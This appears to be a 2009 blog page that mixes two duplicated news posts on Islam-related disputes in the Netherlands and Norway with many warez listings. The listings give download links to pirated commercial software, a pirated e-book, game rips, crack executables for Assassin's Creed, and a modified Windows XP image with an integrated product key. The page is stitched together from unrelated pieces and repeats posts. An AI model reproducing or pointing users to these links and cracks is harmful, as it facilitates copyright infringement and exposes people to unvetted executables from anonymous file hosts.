Tuesday, February 24, 2009

Netherlands: Blogosphere debate

Netherlands: Blogosphere debate

The Dagelijkse Standaard (Daily Standard) is a rather new Dutch-language blog, featuring articles by a list of Dutch writers. Islam expert Hans Jansen was one of those writers, until he discovered that Michael van der Galien, who also writes runs PoliGazette, was a convert to Islam.

Michael van der Galien never hid the fact, but apparently it was new to Jansen. When Jansen discovered that his co-blogger was a convert to Islam, he emailed the blog editor in an exchange of emails (posted on the site, NL), which led to him leaving the blog.

Jansen wrote that having a covert to Islam as a co-fighter for freedom of speech in the Netherlands was something he would have to think about. He later said that he left the blog due to differences of opinion with the chief editor, and not specifically due to this point.

For Michael van der Galien's response to this story (in English), see One man less - a minor Dutch controversy and The side that wants to destroy the West

Sources: Dagelijkse Standaard 1, 2 (Dutch)
Read more...

Norway: 'there is no sneak Islamization here'

Norway: 'there is no sneak Islamization here'

Sometimes one news story follows another so fast, that it's hard to keep up, much less check on events of the past.

In a recent speech Siv Jensen, head of the Norwegian Progress Party, railed against what she called 'sneak Islamization', bringing as one example sex-segregated swimming classes.

Norwegian newspaper Dagbladet visited Oslo school Møllergata, where they have separate swimming and gym classes, and published an articled headlined 'there is no sneak Islamization here'. The sub-headline reads: 'Introduction of sex-segregated gym had nothing to do with Islam, says a prinicipal at an Oslo school'

From the article:

Principal Eva Kjøge tells why they have this custom. "When this was a high school, there were girls who felt run over by the boys in gym class. Therefore we introduced girl classes." She adds: "It had nothing to do with Islam that time."

(..)

The separate gym class arrangement was expanded when the percent of Muslim students increased. Today about 40% of the school's 220 students are Muslims.

(..)

- do you feel that you contribute to sneak Islamization?

"The most important thing is that the student learn to swim," the principal answers diplomatically.

-----

Møllergata school made the news several months ago when discussion flared up around sex-segregated gym and swimming classes. This is what Eva Kjøge told Norwegian news agency NTB last August: "As a result of immigration to the city the problem arose that Muslim girls weren't allowed to have gym and swimming together with boys. Then the school had to find arrangements."

Granted, Eva Kjøge was then a new principal and might not have been aware of the history of the school's gym class arrangements. Reading what she says carefully, she doesn't really contradict herself, either. The arrangement might have been started for girls of all types, but was then expanded because Muslim girls were not allowed by their parents to join those classes.

The problem here is that Dagbladet, so eager to prove there's no 'sneak Islamization', didn't bother digging too deeply. When Kjøge said it had nothing to do with Islam 'that time', the paper didn't want to know when such arragments did have to do with Islam.

Sources: Dagbladet, Addressavisen (Norwegian)

See also:
* Norway: FRP against 'sneak Islamization'
* Oslo: Debate about segregated swimming classes
Permalink: 8:59 AM Comment on this post Trackbacks


Netherlands: Blogosphere debate

Netherlands: Blogosphere debate

The Dagelijkse Standaard (Daily Standard) is a rather new Dutch-language blog, featuring articles by a list of Dutch writers. Islam expert Hans Jansen was one of those writers, until he discovered that Michael van der Galien, who also writes runs PoliGazette, was a convert to Islam.

Michael van der Galien never hid the fact, but apparently it was new to Jansen. When Jansen discovered that his co-blogger was a convert to Islam, he emailed the blog editor in an exchange of emails (posted on the site, NL), which led to him leaving the blog.

Jansen wrote that having a covert to Islam as a co-fighter for freedom of speech in the Netherlands was something he would have to think about. He later said that he left the blog due to differences of opinion with the chief editor, and not specifically due to this point.

For Michael van der Galien's response to this story (in English), see One man less - a minor Dutch controversy and The side that wants to destroy the West

Sources: Dagelijkse Standaard 1, 2 (Dutch)


For more on Jansen:
* Netherlands: Arabist accuses bank of Islamist propoganda
* Netherlands: Arabist Hans Jansen causes irritation among his peers
* Netherlands: Muslims upset at Jansen
* Netherlands: Tolerating Muslims excesses
Read more...

Microsoft System Center Configuration Manager 2007

Microsoft System Center Configuration Manager 2007
Systems Management Server (SMS) | ****** | 924 Mb

The next release of Systems Management Server (SMS), entitled System Center Configuration Manager 2007, is now available for download. With major investments in simplicity, configuration, deployment and security, Configuration Manager 2007 dramatically simplifies system deployment, task automation, compliance management, and policy based security management allowing for increased business agility.

The new release of System Center Configuration Manager 2007 provides the control necessary to manage change in today's dynamic IT infrastructures more effectively. It delivers robust capabilities, including comprehensive deployment and updating functionality, enhanced insight and control, and optimization for Windows with extensibility beyond. These capabilities can be used to manage servers, clients, and handheld devices, across physical, virtual, distributed, or mobile systems. System Center Configuration Manager 2007 is built on key Microsoft technologies such as Windows Server Update Services (WSUS), Active Directory, and Windows OS tools and technologies (Windows Preinstallation Environment (WinPE), WIM, and XML), and leverages the knowledge-driven IT management of System Center. It helps administrators minimize thenumber of OS images to manage, more easily define and track systems compliance, and improve systems performance and security to better manage today's dynamic infrastructure.

homepage :
http://www.microsoft.com/smserver/default.mspx
download :
Code:
http://rapidshare.com/files/113306630/mssccm2007_UDS.part01.rar
http://rapidshare.com/files/113306619/mssccm2007_UDS.part02.rar
http://rapidshare.com/files/113306440/mssccm2007_UDS.part03.rar
http://rapidshare.com/files/113306638/mssccm2007_UDS.part04.rar
http://rapidshare.com/files/113306452/mssccm2007_UDS.part05.rar
http://rapidshare.com/files/113306389/mssccm2007_UDS.part06.rar
http://rapidshare.com/files/113306387/mssccm2007_UDS.part07.rar
http://rapidshare.com/files/113306385/mssccm2007_UDS.part08.rar
http://rapidshare.com/files/113305465/mssccm2007_UDS.part09.rar
Read more...

Portable Auslogic Boost Speed 4.2.8.176 [Mediafire]

BoostSpeed effectively rehabilitates and maximizes PC performance without adding or changing hardware, keeps Microsoft Office and Windows™ components running smoothly, and gives users the ultimate control over Internet connection while providing comprehensive traffic analysis tools."
...this powerful optimization suite will boost Internet, tweak Windows to its peak performance. It's a great way to keep your computer clean and optimized..
"This meticulously written application is an ideal solution for anyone who wants to boost their computer for peak performance without costly hardware upgrades. BoostSpeed gives you a combination of 15 precision-engineered modules, all conveniently delivered in one optimization suite."
Start programs faster. Speed up computer start time. Increase Internet speed, optimize your Internet Explorer, Firefox and E-mail programs.

download
http://rapidshare.com/files/176067360/AuslogicsBoostSpeed_PortableTurk_By_butkuci_www.vietproblog.com.rar
Read more...
BoostSpeed effectively rehabilitates and maximizes PC performance without adding or changing hardware, keeps Microsoft Office and Windows™ components running smoothly, and gives users the ultimate control over Internet connection while providing comprehensive traffic analysis tools."
...this powerful optimization suite will boost Internet, tweak Windows to its peak performance. It's a great way to keep your computer clean and optimized..
"This meticulously written application is an ideal solution for anyone who wants to boost their computer for peak performance without costly hardware upgrades. BoostSpeed gives you a combination of 15 precision-engineered modules, all conveniently delivered in one optimization suite."
Start programs faster. Speed up computer start time. Increase Internet speed, optimize your Internet Explorer, Firefox and E-mail programs.

download
http://rapidshare.com/files/176067360/AuslogicsBoostSpeed_PortableTurk_By_butkuci_www.vietproblog.com.rar
Read more...

Interactive Web-Based Virtual Reality with Java 3D

Interactive Web-Based Virtual Reality with Java 3D
IGI Global | 492 pages | 1599047896 | July 9, 2008 | PDF | 5 Mb

With the emergence of the Java 3D API, the creation of high quality 3D animated graphics for Java applications and applets becomes a possibility. With numerous aspects of the business, science, medical, and educational fields implementing this technology, the need for familiarity of Java 3D amplifies. Interactive Web-Based Virtual Reality with Java 3D provides both advanced and novice programmers with comprehensive, detailed coverage of all of the important issues in Java 3D. This essential book delivers illustrations of essential keywords, syntax, and methods to provide an easy-to-read learning experience for the reader.

Download from Depositfiles
http://depositfiles.com/files/eabtytfxv
Download from Easy-Share
http://w19.easy-share.com/1903242876.html
Read more...

Portable Grammatica (English and French)

Portable Grammatica (English and French)

File size: 15.1Mb
File type: zip

Grammatica is a powerful bilingual grammar and spelling checker for Microsoft Word and Windows. It includes French and English grammar and spell-checking (with grammar explanations and suggested corrections). Its dictionary includes more than 500,000 entries in French and more than 275,000 entries in English.

Grammatica analyses the function of words in a phrase, and can also open Word, HTML and RTF documents. A customizable grammatical lexicon is also available.

Code:
http://www.zshare.net/download/port-gram-zip.html
http://rapidshare.com/files/21677885/Port-Gram.zip
Read more...

Left 4 Dead Full-Rip Skullptura [CAN PLAY ONLINE]

DESCRIPTION

Left 4 Dead puts four human playable or AI controlled survivors of an apocalyptic pandemic against hordes of aggressive

"Infected" zombies in a cinematic backdrop in which the players star as each character in a fictional movie. The Survivors'

goal is to help each other make it through various scenarios to safety. The Infected are controlled by an AI that dynamically

balances difficulty and mood depending on the players' progress and situation. In an alternate game mode, human players

can control up to four different monsters with special abilities and cooperate to stop the Survivor players.

It was released on November 18, 2008 in the United States and November 21, 2008 in Europe to coincide with the tenth

anniversary of the release of Half-Life.[5][6] A five-minute trailer was released on Halloween.[7] A playable demo was made

available on November 6 for pre-purchasers and on November 11 for the general public. The playable demo was closed on

November 18, 2008. The demo contained the first one and a half out of five maps of the "No Mercy" campaign and was

playable in both single player and multi-player. Left 4 Dead went gold on November 13, 2008.

NOTES ON HOW TO INSTALL::

1. Click on setup.bat
2. Follow the screen instructions
3. Play

Download Link(s):

http://rapidshare.com/files/196360930/download.php_f_3m.L3ftD34d_downarchive.part01.rar
http://rapidshare.com/files/196360332/download.php_f_3m.L3ftD34d_downarchive.part02.rar
http://rapidshare.com/files/196361102/download.php_f_3m.L3ftD34d_downarchive.part03.rar
http://rapidshare.com/files/196358857/download.php_f_3m.L3ftD34d_downarchive.part04.rar
http://rapidshare.com/files/196358844/download.php_f_3m.L3ftD34d_downarchive.part05.rar
http://rapidshare.com/files/196358764/download.php_f_3m.L3ftD34d_downarchive.part06.rar
http://rapidshare.com/files/198301061/dl.php_file_download.php_f_3m.L3ftD34d_downarchive.part07.rar
http://rapidshare.com/files/196361386/download.php_f_3m.L3ftD34d_downarchive.part08.rar
http://rapidshare.com/files/198303094/dl.php_file_download.php_f_3m.L3ftD34d_downarchive.part09.rar
http://rapidshare.com/files/196357251/download.php_f_3m.L3ftD34d_downarchive.part10.rar
Read more...

assassin creed

Assassin's Creed is a video game developed by Ubisoft Montreal and published by Ubisoft. It was released worldwide in November 2007 on the Xbox 360 and PlayStation 3 video game consoles.[1] The North American PC version was released on April 8, 2008.

A prequel for this game, titled Assassin's Creed: Altaïr's Chronicles, developed by Gameloft,[10] was released on February 5, 2008 for the Nintendo DS.[11] It was also ported to the Symbian Mobile. A sequel was confirmed by Ubisoft, tentatively to be released in 2010

Plot:

The main story of Assassin's Creed takes place in September 2012; Desmond Miles, a bartender, has been kidnapped by the fictional company Abstergo Industries in order to be used as a test subject in the "Animus," a device that can stimulate the recall of ancestral memories buried in the user's DNA. Abstergo has Desmond use the device to recall the role of Altaïr Ibn La-Ahad (الطائر ابن لا أحد , Arabic: "The Flying One, Son of None" or "The Bird, Son of None"), one of Desmond's ancestors, in the "Assassin Brotherhood" during 1191 as part of the Third Crusade in the Holy Land. The character and his clan are based on a true military wing, called Hashshashin along with a Jewish assassin group called the Zealots, the idea for it coming from "Blitzkrieg to Desert Storm: The Evolution of Operational Warfare" by Robert M. Citino along with Bartol's novel Alamut.[13][14] Desmond at first has trouble adjusting to the device, but eventually is able to relive Altaïr's exploits over the next several days. Much of the core game is then presented from Altaïr's point-of-view as seen by Desmond, though at times interrupted by glitches resulting from the Animus.

At the start of the memories, Altaïr is shown attempting to retrieve a "Piece of Eden", a strange artifact, from Solomon's Temple with the help of other assassins, but is stopped by Robert IV de Sablé, a member of the Knights Templar and sworn enemies of the assassins. While retrieving the treasure, Altaïr breaks all three tenants of the Assassin's Creed [them being: 1) "Stay your blade", 2) "Hide in plain sight", and 3) "Never compromise the brotherhood."] to attempt to kill de Sablé, but fails; upon returning to the Brotherhood, Al Mualim (المعلم): "The teacher", leader of the Assassins, demotes Altaïr to an initiate, making him a novice again and giving him another chance to rise through the ranks of the Brotherhood. To this end, Al Mualim assigns Altaïr the task of assassinating nine key figures across the Holy Land in Jerusalem, Acre, and Damascus, in order to attempt to bring peace between the Crusaders and Muslim forces. Altaïr methodically completes each task, learning that each target is connected to Robert and the Templars and share their mysterious goals. As he completes each of the assassinations, he finds out that the Templars are trying to trick the Muslim and Christian forces to work together and face a common enemy, the assassins. As he kills each of his targets, each of them talk to him and tell him about their goal to bring peace and unity in this world, the same thing that the assassins want. This is also supported by a conversation by Lucy (Abstergo's assisstant). She tells him that what they do is bad, though their ultimate goal is good. Altaïr's final target, de Sablé, reveals in his dying words that Al Mualim is himself a member of the Knights Templar, and used Altaïr to kill the other members so he could keep the treasure for himself. Altaïr quickly returns to Masyaf to accost his master. Al Mualim reveals the truth; the Piece of Eden creates illusions, and he denounces religion and other seemingly supernatural events as illusions caused by it. He then states his intention to use the artifact to compel mankind into a brainwashed state and so bring an end to conflict. Altaïr attempts to kill his former master, but Al Mualim uses the Piece of Eden to warp Altaïr's vision. Altaïr is eventually able to see through the deception and kill Al Mualim, recovering the artifact. As he does, the Piece of Eden activates, showing a holographic view of the world with numerous locations marked across the globe.
Cryptic messages on the wall of Desmond's bedroom at the end of the game.

With Altaïr's memory complete, Desmond wakes up out of the Animus and learns that Abstergo Industries is already sending out recovery teams to locations shown by the "Piece of Eden" in Altaïr's memory, hoping to find additional artifacts. Desmond, no longer being of use to the Knights Templar, is to be silenced; however, he is saved by a researcher named Lucy Stillman, who reveals herself to be an Assassin by showing her hand with her ring finger closed as if it were missing. In the conclusion of the game, Desmond, having become "synchronized" with Altaïr, is able to use the eagle vision (a sort of empathic sight to see hidden messages and tell friend from foe) and by looking at Lucy, he can see that she is an ally to him (shown by her glowing blue), giving further proof that she is a genuine Assassin. He also sees messages that only he can see, scrawled across the floors and walls that refer to the end of the world described by several religions, among other writings; such writings include references to the biblical passage Revelation 22:13 ("I am the Alpha and the Omega, the first and the last, the beginning and the end."), a Lorenz attractor, the Eye of Providence, as well as part of a Mandelbrot set and other writings in foreign languages. Additionally, there is the Mayan date of 13.0.0.0.0—December 21, 2012—which is only three months away within the game's timeline and represents the planned date of the launch of a mysterious satellite the Templars have created, which they claim will "permanently end the war." It shows a picture of all the planets alligned in a row which will supposedly happen on 12/21/12. The Arabic word "Az-Zalzala", literally meaning "The Earthquake" can be seen, which is the title of a chapter in the Qur'an that talks about Judgement Day. Some Nazca Line drawings are also found. There is also a reference to Yonaguni, a Japanese island similar to Atlantis. Also written on the wall of his room are the Hebrew words "Olam ha-Ba" (עולם הבא), meaning "the next world" or "after-life". Further investigation after the credits reveals an email sent to Vidic by Lucy, stating that the drawings come from a mysterious "subject sixteen" who went insane due to what they described as a "bleeding effect" (essentially, genetic memory assimilation comes to a point where the subject can no longer distinguish between their life and their ancestors' memories. Lucy speculates that, though subject sixteen's "bleeding" was brought on by too much time spent in the Animus, natural forms may occur, such as Dissociative Identity Disorder and other forms of dementia).


Download Link(s):

ftp://85.30.198.59/Games/Assasins%20Creed%20(Akella)/ASSASSINS_CREED.mdf

ftp://85.30.198.59/Games/Assasins%20Creed%20(Akella)/ASSASSINS_CREED.mds

Crack:

ftp://85.30.198.59/Games/Assasins%20Creed%20(Akella)/Crack/AssassinsCreed_Dx10.exe

ftp://85.30.198.59/Games/Assasins%20Creed%20(Akella)/Crack/AssassinsCreed_Dx9.exe
Read more...

R-Wipe Clean 8.5 Build 1511

R-Wipe & Clean is a complete solution to wipe useless files and keep your computer privacy. Irretrievably deletes private records of your on- and off-line activities, such as temporary internet files, history, cookies, autocomplete forms and passwords, swap files, recently opened documents list, Explorer MRUs, temporary files, etc., traces from more than 200 third-party applications, and free up your disk space. The utility wipes files and unused disk space using either fast or secure erase algorithms. All files and folders may be combined in wipe lists to erase them in a single procedure.
R-Wipe & Clean wipes all files to ensure their total unrecoverable elimination. Supports both the FAT and NTFS file systems. All separate wiping and cleaning tasks can be combined in one or more erasing procedures launched immediately or at predefined times or events as a background task.

Total computer cleaning:

* Verify and select information before irretrievable wiping.
* Wipe and delete temporary Internet files.
* Wipe and delete cookies, small files that web sites store on your computers for identification purposes. Your favorite cookies may be safely kept.
* Wipe and delete Flash cookies, small files that web sites create on your computer.
* Wipe and delete Java and Microsoft VM logs.
* Clean autocomplete forms : logins, user names, passwords and other personal information entered at web sites and keywords entered at search engines.
* Clean history: lists of visited web sites.
* Clean list of recently opened documents.
* Clean list of open file history.
* Clean Windows clipboard content.
* Wipe and delete temporary files created by Windows and other programs.
* Clean system Registry traces: run list, search results, mapped network drives, attached peripheral devices, last opened Registry key, etc.
* Clean MFUs: lists of most frequently used programs, start menu links and icons, Control Panel items, Favorite Web pages, and Internet Explorer buttons.
* Wipe .dat files (even locked) to remove any leftovers after incorrect Windows shutdowns.
* Wipe and delete offline content.
* Clean activity traces from more than 200 third-party applications, including Microsoft Office, standard Windows, and numerous popular programs. Installed applications are detected automatically.
* Create customized wipe lists to clean activity traces from any application that R-Wipe&Clean currently does not support. Such wipe lists may include application working and temporary folders and files, and registry keys.
* Wipe Windows swap files.
* Wipe and delete invalid Desktop shortcuts: the shortcuts that are on your Desktop but not linked to any existing objects.
* Clean Windows event logs.
* Wipe Windows built-in Firewall logs.
* Clean links to recent network folders.
* Wipe auxiliary temporary files: setup temporary and log files, memory dump files, old Check Disk files..
* Wipe and delete Prefetch traces.
* Wipe and delete Defragmentation list.
* Clean Stored Explorer View Settings.
* Clean Stored Application Descriptions.
* Wipe and delete cached Icons and Fonts.
* Wipe and delete Windows update logs .
* Wipe and delete WMI, Diagnostics, and Security Management logs.
* Clean Stored Network Passwords.

File wiping:

* FAT and NTFS file systems support.
* Wipes files using several selectable fast or strong erase algorithms, including DOD-approved. Files can be wiped directly from Windows Explorer.
* Predefined wipe lists: lists of files and folders that are wiped through a single task. Files and folders can be added to a current wipe list directly from Windows Explorer.
* Wipes file's alternate data streams.
* Wipes cluster tips: free parts of file clusters.
Disk wiping:

* FAT and NTFS file systems support.
* Wipes unused disk space using several selectable fast or strong erase algorithms, including DOD-approved.
* Wipes unused space on a single disk directly from the R-Wipe & Clean tab in the disk Properties.
* Wipes unused space of several disks through one single wipe task.
* Wipe records of small files stored directly in the NTFS Master File Table.
Scheduler:

* You may combine all cleaning and wiping tasks in different erasing procedures launched manually or at scheduled times or events (user logon / logoff, system start up / shutdown, closing any or all browsers, etc.)
* A cleaning and wiping task may be started from a command line.
* When schedule is set, erasing procedure starts automatically as a background task.
* Scheduler can turn your computer off when the erasing procedure is completed.

Additional useful features:
* Detailed representation of all records of on- and off-line activity on your computer.
* The Boss Key: emergency web-browser closing.
* Ultimate Popup blocker.
* Stealth mode.
* Customizable system integration: most wipe and delete operation can be performed directly from Windows.
* Password protection.
* Standby/hibernate control: your computer will not hibernate until R-Wipe&Clean finishes its long job.
* Customization: only necessary items can be visible in R-Wipe&Clean.

[b]New R-Wipe & Clean 8.0 supports all recent versions of Internet Explorer, Mozilla /Mozilla Firefox, Opera, NETSCAPE, AOL, MSN, and BT Yahoo browsers as well as the Google and MSN toolbars and removes traces from 200+ third-party applications, including Microsoft Office 2007.

Home Page:

http://www.r-wipe.com

Size: 3.89 MB

Code:
http://rapidshare.com/files/197726424/R-Wipe.Clean.8.5.Build.1511.IQ8Y1.rar
Read more...

Stardock Windows FX 3.0

Stardock WindowFX 3.0 adds plenty of visual effects and changes to the interface Windows XP:
- semilucent pls under windows,
- ability to displace windows with the use of morfinga,
- different types of onimacii at opening/closing of windows,
- it is possible to use large icons on a workmount, saving here, standard size of icons in other places,
- adding of effect to semilucentness to the different elements of windows, - et cetera

Download Link(s):

Download | LetitBit

Download | DepositFiles

Download | UploadBox

Download | VIP-File
Read more...
Windows XP Professional SP3 Corporate With Vista Media Center DVD 2009 (Supported Sata/Raid)

RELEASE INFO
Release Date .... January 31, 2009
Program Type ... OS
Protection ......... Gates?
Platform ............ Windows XP Professional SP3 Corporate With Vista Media Center DVD
Language .......... English
Image Type ....... DVD ISO

INSTALL NOTES
1. Unrar and burn with Nero/UltraISO
2. License Product key intergated.

RELEASE NOTES:

Design base on Original Windows XP Professional with Service Pack 3
Windows XP Professional with Service Pack 3 - VL (x86) - CD (English)
Date Posted (UTC):5/2/2008 12:05:18 AM
Windows XP Professional with SP3 VL English
FILE: en_windows_xp_professional_with_service_pack_3_x86 _cd_vl_x14-73974.iso
Size: 589.14 MB
MD5: 5BF476E2FC445B8D06B3C2A6091FE3AA
SHA1: 66ac289ae27724c5ae17139227cbe78c01eefe40
ISO/CRC: FFFFFFFF

Warez Intergated
Windows XP Post-SP3 Update Pack version 1.0.3
Mediacenter vista sounds
Windows MediaPlayer11
Internet Explorer7
Sidebar
CPLBonus
Vista Drive
Uber Pack
Nlite\mp11 slipsteamer
KMPlayer with 11 skins (3 Vista)
Vista Codec Package 4.7.2
Setup billboard
Shell32 (avi's)
Oobe
System properties
Logon screen
Removed recyclebin from desktop


Drivers intergated:
Sata/Raid drivers intergated so supported newest Laptop/Desktop
+Intel ICH7R/M, ICH8R/M, ICH9R/M or ICH10R/D S-ATA AHCI and RAID Controllers
+nForce2/3/4 SataRAID and PataRAID systems

Intergated all hotfixs update to January 18, 2009
Quote:
KB281981 - Disconnected sessions retain the original variable
KB887606 - Microsoft XML Parser (MSXML) uses cached credentials incorrectly
KB898461 - Permanent copy of the Package Installer for Windows version 6.3.13.0
KB909520 - Software update for Base Smart Card Cryptographic Service Provider
KB917275 - Windows Rights Management Services for Windows XP
KB922120 - Network Map in Windows Vista does not display computers that are running Windows XP
KB931125 - Microsoft Root Certificates Update (November 2008)
KB932578 - Event ID 55 may be logged in the System log when creating many files on an NTFS partition
KB932716 - Image Mastering API v2.0 (IMAPIv2.0) update
KB938759 - Cannot distribute or install a software package if the software package contains a very large signed file
KB940648 - "You might not have permission to use this network resource" error when trying to open My Documents folder after resuming from hibernation
KB942213 - The MMC.exe program randomly becomes unresponsive when the user clicks OK or Cancel several times to close a Windows form
KB942288 - Windows Installer 4.5
KB943232 - An application that uses Sxs.dll crashes when running the application
KB943729 - New Group Policy preferences in Windows Server 2008
KB944043 - Windows Server 2008 read-only domain controller compatibility pack
KB946648 - Security update for Windows Messenger 4.7
KB947460 - ": is not accessible" error when trying to open a mapped DFS folder after coming out of standby
KB948046 - A Word document is not printed as expected after installing the Windows European Union Expansion Font pack
KB948101 - USB keyboard does not work after restarting a computer that has an NVIDIA 680i motherboard
KB948720 - Cannot install device drivers in a Windows Server 2008 cluster environment if the drivers contain LZ-compressed files
KB949033 - Severe video degradation and a Stop error when connecting a USB Webcam to the computer
KB949127 - Cannot establish a wireless connection using EAP authentication if the Service Set Identifier (SSID) includes a comma
KB949764 - A USB device no longer works after resuming computer from hibernation (S4)
KB949900 - The RunOnce.exe process may stop responding during the driver installation process
KB950234 - " is not accessible. Access is denied" error when trying to open a shared file in Windows Explorer
KB950312 - "The application failed to initialize properly (0xC0000142)" error when trying to start a console-based application
KB950616 - An audio application that uses the Portcls.sys file may stop responding
KB950762 - Vulnerabilities in Pragmatic General Multicast (PGM) could allow denial of service
KB950974 - Vulnerability in Event System could allow remote code execution
KB951066 - Security update for Outlook Express
KB951126 - Multiprocessor computer stops responding on a black screen after resuming from hibernation
KB951163 - When trying to connect to the local computer using the MSTSC command, a black screen may appear for several minutes
KB951376 - Vulnerability in Bluetooth stack could allow remote code execution
KB951531 - The W32Time service does not synchronize the CMOS clock time to the Internet time after the W32Time service stops
KB951618 - A black screen occurs when upgrading the operating system on a computer that has Onekey Recovery 5.0 installed
KB951624 - A 30-second delay occurs during the initialization of some network-based applications
KB951698 - Vulnerabilities in DirectX could allow remote code execution
KB951709 - Event ID 26 when attaching two IDE ATA/ATAPI devices as master and subordinate IDE devices
KB951978 - Script output is not displayed as expected when running VBScript or JScript scripts
KB952069 - Security update for Windows Media Format Runtime and Media Foundation
KB952206 - Printer-driver upgrade fails on printer clients when multiple printer queues are upgraded at the same time
KB952954 - Vulnerabilities in Microsoft Windows Image Color Management could allow remote code execution
KB953024 - Rich Text Format (.rtf) files may not print correctly when using an application that uses the RichEdit control
KB953028 - An application experiences an access violation and then crashes if the computer has more than four cores or more than four logical processors
KB953155 - Vulnerability in Windows Internet Printing service could allow remote code execution
KB953609 - "At least one of your changes was not applied successfully to the wireless configuration" error when adding a wireless network
KB953761 - Some DHCP Options are not recognized when the DHCP server offer includes option 43
KB954193 - Jet 4.0 Database Engine cumulative hotfix package: July 2, 2008
KB954232 - On-Screen Keyboard behavior does not mimic the physical keyboard behavior in certain scenarios
KB954600 - Security update for Windows Media Player 6.4
KB954708 - Update to add support for the serialization of complex Extensible Metadata Platform (XMP) data types in the Windows Imaging Component
KB954879 - The LSASS.exe process crashes and the computer restarts when trying to start the Network Access Protection Agent service
KB954920 - Various error messages when an application requests a result set from new SQL Server 2008 collations
KB955043 - A memory leak may occur when running an application that uses the DHTML Edit control
KB955069 - Security update for XML Core Services 3.0
KB955109 - 0xC0000005 (Access Violation) error when running an application that uses the Application Desktop Toolbar (AppBar) component
KB955356 - When trying to start a computer that is connected to an IEEE1394 hard disk, it stops responding before the logon screen appears
KB955417 - Protected storage (PStore) uses a lower-quality cryptographic function when the system locale is set to French (France)
KB955567 - Data corruption may occur when trying to append data to a FILESTREAM varbinary (max) column in SQL Server 2008
KB955576 - TAPI-based applications stop responding, and you cannot disconnect telephone calls on a Windows XP-based telephony server
KB955832 - SSL connection may fail when using Internet Explorer to make an SSL connection to an HTTPS Web site that is certified by a DSS certificate
KB955839 - Cumulative time zone update (December, 2008)
KB955843 - An ADO-based application may stop responding when it uses the adAsyncExecute option to open a Recordset object
KB955988 - The Win32_Environment WMI class doesn't return the value of the PATH environment variable if it contains more than 1,024 characters
KB956072 - Terminal server does not allow RDP connections whose encryption level is set to Low
KB956391 - Cumulative security update for ActiveX (October, 2008)
KB956625 - Computer becomes unstable or crashes after running Internet Explorer 7 for a long time
KB956802 - Vulnerabilities in GDI could allow remote code execution
KB956807 - The Unicode hyphen character (U+2010) is not drawn when using an application that uses GDI+ API functions
KB956841 - Vulnerability in Virtual Address Descriptor manipulation could allow elevation of privilege
KB957263 - Changes to the custom properties of a program that supports custom properties may not be saved
KB958106 - Some components of an application not displayed correctly in a Terminal Services session
KB958149 - Performance decreases when streaming isochronous data on a computer that has a TI IEEE1394 host controller
KB958215 - Cumulative security update for Internet Explorer (December, 2008)
KB958244 - System may stop responding when restarting a multicore computer
KB958282 - 0x00000050 stop error when an application calls the NtGdiRectInRegion function
KB958347 - Device that is connected through a 1394 FireWire hub is still present in system after hot unplugging it
KB958644 - Vulnerability in Server service could allow remote code execution
KB958655 - "API call rejected - No actions in Context" error when installing multiple MSI packages
KB958687 - Vulnerabilities in SMB could allow remote code execution
KB958752 - Application compatibility issue with the version of AFD.sys that is released with MS08-037 and MS08-066 security updates
KB958817 - Automatic Update window may stop responding when using a WSUS server to deploy updates
KB959237 - Internet Explorer crashes when browsing a page that fetches and filters a recordset asynchronously from an instance of SQL Server
KB959267 - After repeatedly docking and undocking a portable computer, unable to change state of attached network device
KB959334 - Text that has the font set to Arial Black and the font style set to bold may change so that the font style is set to italic opening the document
KB959439 - After uploading encrypted files to a WebDAV share, the files remain encrypted
KB959465 - Write protection does not always work on SD memory cards
KB960071 - An access violation occurs when using an application that calls the SQLExecDirect function of the SQL Server ODBC driver to run a long query
KB960380 - A hyperlink control that is used to open a file or an e-mail message fails in an application that uses MSXML 6.0
KB960417 - When running an application that uses the SystemTimeToTzSpecificLocalTime function, performance is very poor
KB960680 - Update the Slovak koruna currency symbol (Sk) to the Euro (€) the Turkish currency symbol from Yeni Türk Lirasi (YTL) to Türk Lirasi (TL)
KB960714 - Security update for Internet Explorer

Other Updates
Adobe Flash Player 10.0.12.36 ActiveX Control
Code65536 FontReg 2.1.1
Microsoft European Union Expansion Font Update 1.2
Microsoft Qfecheck 6.2.29.0
Microsoft Update 7.2.6001.788
MSXML 4.0 SP2 (Includes KB954430 Hotfix)

Miscellaneous Tweaks
KB873374 - Microsoft GDI+ Detection Tool Registry Entry
KB890830 - Microsoft Malicious Software Removal Tool 2.6
Windows XP SP3 WBEM Fix




link download


http://rapidshare.com/files/191952499/ehres.rar

http://rapidshare.com/files/191883822/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part01.rar
http://rapidshare.com/files/191883842/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part02.rar
http://rapidshare.com/files/191883759/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part03.rar
http://rapidshare.com/files/191883727/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part04.rar
http://rapidshare.com/files/191883790/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part05.rar
http://rapidshare.com/files/191883857/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part06.rar
http://rapidshare.com/files/191883823/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part07.rar
http://rapidshare.com/files/191883866/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part08.rar
http://rapidshare.com/files/191883808/_DVD_GRTMPVOL_VMC_EN_downarchive.com.part09.rar

Or:
http://rapidshare.com/files/191880175/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part01.rar
http://rapidshare.com/files/191880141/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part02.rar
http://rapidshare.com/files/191880203/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part03.rar
http://rapidshare.com/files/191880219/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part04.rar
http://rapidshare.com/files/191880207/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part05.rar
http://rapidshare.com/files/191880250/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part06.rar
http://rapidshare.com/files/191880230/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part07.rar
http://rapidshare.com/files/191880149/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part08.rar
http://rapidshare.com/files/191880159/_DVD_GRTMPVOL_VMC_EN_www.softarchive.net.part09.rar

Or:
http://www.mediafire.com/?sharekey=1020ad984f5e4ceb91b20cc0d07ba4d247f717ea464d130a
Read more...

Advanced Installer 6.8

Changes in Version 6.8 (February 5th, 2009):
* Import Inno Setup projects
* Call function from standard DLL predefined custom action
* Ability to add new dialogs directly in the UI Sequence
* List all databases the user can connect to
* Detect process and stop process predefined custom actions
